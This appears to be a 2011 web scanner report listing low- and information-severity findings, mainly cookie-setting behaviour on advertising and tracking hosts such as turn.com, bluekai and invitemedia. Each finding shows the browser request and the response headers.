HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Fri, 11-Nov-2011 20:26:57 GMT; Path=/ Set-Cookie: pf=_fnFNfxp6XXik7nKu Content-Type: image/gif Content-Length: 43 Date: Sun, 15 May 2011 20:26:57 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /r/du/id/L21rdC8xL21 |
GET /r/du/id/L21rdC8xL21 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/ Set-Cookie: rrs=1002%7C1; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/ Set-Cookie: rds=15110%7C15110; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/ Location: http://d.p-td.com/r/dm Content-Length: 0 Date: Mon, 16 May 2011 01:19:58 GMT |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=4 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:28 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 16 May 2011 01:22:27 GMT Content-Length: 335 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r1-ads.ace |
Path: | /site=786652/size=728090 |
GET /site=786652/size=728090 Host: r1-ads.ace.advertising Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=qw280013054845430029 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:20:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Comscore: CMXID=2115.1007584.786652 Set-Cookie: C2=JvH0NFJwHsb0FtfqH Set-Cookie: F1=Bk8eQ3EBAAAABAAAA Set-Cookie: BASE=x7Q9Mi23SwnkpMd Set-Cookie: ROLL=U6APIjeKkzEWubp Set-Cookie: 71920917=_4dd07bc9 Cache-Control: private, max-age=0, no-cache Expires: Mon, 16 May 2011 01:20:10 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 601 document.write('<SCRIPT language=\'JavaScript1.1\ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://segment-pixel |
Path: | /pixel |
GET /pixel?pixelID=2083 Host: segment-pixel.invitemedia Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=f034cbc4-3674-4d22 |
HTTP/1.1 302 Found Date: Mon, 16 May 2011 01:42:56 GMT Set-Cookie: segments_p1="eJzjYuG Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Cache-Control: no-cache Location: http://ad.yieldmanager Content-Length: 0 Connection: close Server: Jetty(7.3.1.v20110307) |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Stats/Tracker.gif |
GET /ver1.0/Stats/Tracker.gif Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SiteLifeHost=gnvm6l3 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: no-cache Pragma: no-cache Content-Length: 0 Content-Encoding: deflate Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:28:20 GMT Connection: close |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/USAT/pluck |
GET /ver1.0/USAT/pluck Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449798794; path=/ Cache-Control: private Content-Length: 30408 Content-Type: text/css Last-Modified: Sun, 15 May 2011 08:31:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm6l3pluckcom Set-Cookie: SiteLifeHost=gnvm6l3 Set-Cookie: anonId=81fbd51d-fba0-4197 Date: Mon, 16 May 2011 01:19:46 GMT Connection: close /************************ * * CSS control - DO NOT CHANGE OR REMOVE * needed to track loading of this css file * ************************* .pluck-comments-css ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/USAT/pluck/pluck |
GET /ver1.0/USAT/pluck/pluck Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449690983; path=/ Cache-Control: private Content-Length: 34563 Content-Type: text/css Last-Modified: Sun, 15 May 2011 08:27:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm3l3pluckcom Set-Cookie: SiteLifeHost=gnvm3l3 Set-Cookie: anonId=ea7d33cf-ffc2-4016 Date: Mon, 16 May 2011 01:19:46 GMT Connection: close /************************ * * CSS control - DO NOT CHANGE OR REMOVE * needed to track loading of this css file * ************************* .pluck-css-loaded { /* DO NOT ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 89538 Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:29:50 GMT Connection: close plcb0('\r\n\r\n<div class=\"pluck-app ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/usat/pluck |
GET /ver1.0/usat/pluck Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 37055 Content-Type: application/x-javascript Last-Modified: Sun, 15 May 2011 08:42:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:20:44 GMT Connection: close // Plugin to contain scripts frequently used across multiple widgets // Minipersona, report abuse, that sort of thing. pluckAppProxy.regist // init function, c ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/usat/pluck/pluck |
GET /ver1.0/usat/pluck/pluck Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 53489 Content-Type: application/x-javascript Last-Modified: Sun, 15 May 2011 08:42:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:20:35 GMT Connection: close // Plugin to contain scripts frequently used across multiple widgets // Minipersona, report abuse, that sort of thing. pluckAppProxy.regist // init function, called fir ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sync.mathtag.com |
Path: | /sync/img |
GET /sync/img?mt_exid=11&type Host: sync.mathtag.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=4dd07bc8-e97b-118c |
HTTP/1.1 302 Found Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1c72 7282 Cache-Control: no-cache P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Mon, 16 May 2011 01:26:25 GMT Location: http://bh.contextweb.com Etag: 4dd07bc8-e97b-118c-3dec Connection: Keep-Alive Set-Cookie: ts=1305509185; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:26:25 GMT Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://t.invitemedia.com |
Path: | /track_imp |
GET /track_imp?partnerID=9 Host: t.invitemedia.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: exchange_uid="eyI0Ij |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 16 May 2011 01:26:58 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Mon, 16-May-2011 01:26:38 GMT Content-Type: image/gif Pragma: no-cache Cache-Control: no-cache Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/ Set-Cookie: impressions="{\"594387\": [1305509218+ \"c76fa991-e8e9-36fa-8db6 Set-Cookie: camp_freq_p1="eJzjku Set-Cookie: io_freq_p1="eJzjEufo Content-Length: 43 GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getad.aspx |
GET /TagPublish/getad.aspx Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cwbh1=2532%3B06%2F14 |
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" CW-Server: CW-WEB28 Location: /TagPublish/STB.htm Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 173 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Vary: Accept-Encoding Date: Mon, 16 May 2011 01:20:42 GMT Connection: close Set-Cookie: V=8vciuQJMXXJY; domain=.contextweb.com; expires=Wed, 16-May-2012 01:20:42 GMT; path=/ <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="/TagPublish/STB.htm </body></html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://tags.bluekai.com |
Path: | /site/2948 |
GET /site/2948?phint=idswap Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://tags.bluekai.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkou=KJhMRsOQRsq |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:39:27 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: bklc=4dd0804f; expires=Wed, 18-May-2011 01:39:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bk=e/5GeOcyjISd8JkA; expires=Sat, 12-Nov-2011 01:39:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJhgTVjQIwsWAVam Set-Cookie: bkst=KJhMR5Mwhze9pkY Set-Cookie: bkdc=res; expires=Tue, 17-May-2011 01:39:27 GMT; path=/; domain=.bluekai.com P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags Expires: Tue, 17 May 2011 01:39:27 GMT Cache-Control: max-age=86400, private BK-Server: d08b Content-Length: 62 Content-Type: image/gif GIF89a.............!. |
Severity: | Information |
Confidence: | Certain |
Host: | http://tags.bluekai.com |
Path: | /site/3358 |
GET /site/3358?id=8vciuQ Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bk=0E0bL1V5c/sd8JkA; bkc=KJpM8sJQteV5QKaW |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:26:43 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: bklc=4dd07d53; expires=Wed, 18-May-2011 01:26:43 GMT; path=/; domain=.bluekai.com Set-Cookie: bk=uiT+m1V5c/sd8JkA; expires=Sat, 12-Nov-2011 01:26:43 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJpM8sJQteV5QKau Set-Cookie: bkst=KJhMRjeMjVeQRq9 Set-Cookie: bkdc=res; expires=Tue, 17-May-2011 01:26:43 GMT; path=/; domain=.bluekai.com P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags Expires: Tue, 17 May 2011 01:26:43 GMT Cache-Control: max-age=86400, private BK-Server: c53d Content-Length: 62 Content-Type: image/gif GIF89a.............!. |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.imiclk.com |
Path: | /cgi/r.cgi |
GET /cgi/r.cgi?m=3&mid Host: www.imiclk.com Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: YU=593390c429fc100c2 |
HTTP/1.1 200 OK Server: Apache/2.0.63 (CentOS) P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" Cache-Control: no-store Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 224 Date: Mon, 16 May 2011 01:43:17 GMT Connection: close Set-Cookie: CH=24785,53brJ,22244 Set-Cookie: RQ=1267,53br0,2831,53br0 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head> <img src="http://pixel.mathtag ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mcafeesecure |
Path: | /ads/1002/25 |
GET /ads/1002/25 HTTP/1.1 Host: www.mcafeesecure.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 302 Found Server: McAfeeSecure Vary: Accept-Encoding Location: http://www.siteadvisor Set-Cookie: adclick=1002-25; domain=.mcafeesecure.com; path=/; expires=Mon, 13-Jun-2011 01:39:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 96 Connection: close Date: Mon, 16 May 2011 01:39:27 GMT The URL has moved <a href="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.passporte |
Path: | /forums/ |
GET /forums/ HTTP/1.1 Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:31:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 Set-Cookie: bblastvisit=1305508789; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards Set-Cookie: bblastactivity=0; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards Cache-Control: private Pragma: private Content-Type: text/html; charset=ISO-8859-1 X-UA-Compatible: IE=7 Set-Cookie: vbseo_loggedin=deleted; expires=Sun, 16-May-2010 01:31:55 GMT; path=/ Content-Length: 162646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://disneycruise |
Path: | /reservations/customize |
GET /reservations/customize Host: disneycruise.disney.go Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=854018943 |
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=0E9D6993A Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Location: http://disneycruise Content-Length: 0 Date: Mon, 16 May 2011 01:35:27 GMT Set-Cookie: DCL_POOL=1;path=/; |
Severity: | Low |
Confidence: | Firm |
Host: | http://eval.bizrate.com |
Path: | /js/survey_126457_1.js |
GET /js/survey_126457_1.js HTTP/1.1 Host: eval.bizrate.com Proxy-Connection: keep-alive Referer: http://www.gnc.com/home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: trafficSourceDebugParam=; Domain=.bizrate.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ P3P: CP="NON DSP ADM DEV PSD CUSo OUR IND STP PRE NAV UNI" Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: sessionid=7202325108 Set-Cookie: br=13055101949906417 Set-Cookie: _data=_time%3A%3Astart Content-Type: text/html;charset=ISO Content-Language: en-US Date: Mon, 16 May 2011 01:43:13 GMT Content-Length: 16130 <!-- // hide script var BIZRATE = { init:function() { this.mid = '126457'; this.type = 1; if (typeof(this.type) != 'undefined' && this.type > 0 && this.type <= 3) { ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://ots.optimize |
Path: | /ots/ots/js-3.0/90335 |
GET /ots/ots/js-3.0/90335 Host: ots.optimize.webtrends Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:20:11 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=15AB95930 Via: 1.1 ots.optimize.webtrends p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Vary: Accept-Encoding, User-Agent Content-Length: 9407 Connection: Keep-Alive /** * Copyright 2005-2009 webtrends All Rights Reserved. * WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. * * $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://ots.optimize |
Path: | /ots/ots/js-3.0/90335 |
GET /ots/ots/js-3.0/90335 Host: ots.optimize.webtrends Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=15AB95930 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:27:16 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=D05F7BC70 Via: 1.1 ots.optimize.webtrends p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Vary: Accept-Encoding, User-Agent Content-Length: 9407 Connection: Keep-Alive /** * Copyright 2005-2009 webtrends All Rights Reserved. * WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. * * $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://shop.pacsun.com |
Path: | / |
GET / HTTP/1.1 Host: shop.pacsun.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Server: Apache Location: http://shop.pacsun.com Content-Length: 0 Content-Type: text/html;charset=ISO Vary: Accept-Encoding Expires: Mon, 16 May 2011 01:43:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:43:30 GMT Connection: close Set-Cookie: JSESSIONID=4A5CD2AB1 Set-Cookie: PIPELINE_SESSION_ID Set-Cookie: stop_mobi=yes; path=/; domain=pacsun.com |
Severity: | Low |
Confidence: | Firm |
Host: | http://sony.links.origin |
Path: | /pages/wl.asp |
GET /pages/wl.asp?nCTID=0 Host: sony.links.origin Proxy-Connection: keep-alive Referer: http://sony.links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: serverstamp=4B88CCEA-94CF |
HTTP/1.1 302 Object moved Date: Sun, 15 May 2011 20:26:46 GMT Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" pragma: no-cache Location: http://ttwbs.channel Content-Length: 667 Content-Type: image/gif Expires: Sun, 15 May 2011 20:25:46 GMT Set-Cookie: sessionstamp=1186043; expires=Sun, 15-May-2011 21:26:46 GMT; domain=.channelintel Set-Cookie: serverstamp=4B88CCEA Set-Cookie: ASPSESSIONIDACQQQDBC Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://ttwbs.channel |
Path: | / |
GET /?eid=203&oid=6553221 Host: ttwbs.channelintelligence Proxy-Connection: keep-alive Referer: http://sony.links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sessionstamp=1186043; serverstamp=4B88CCEA |
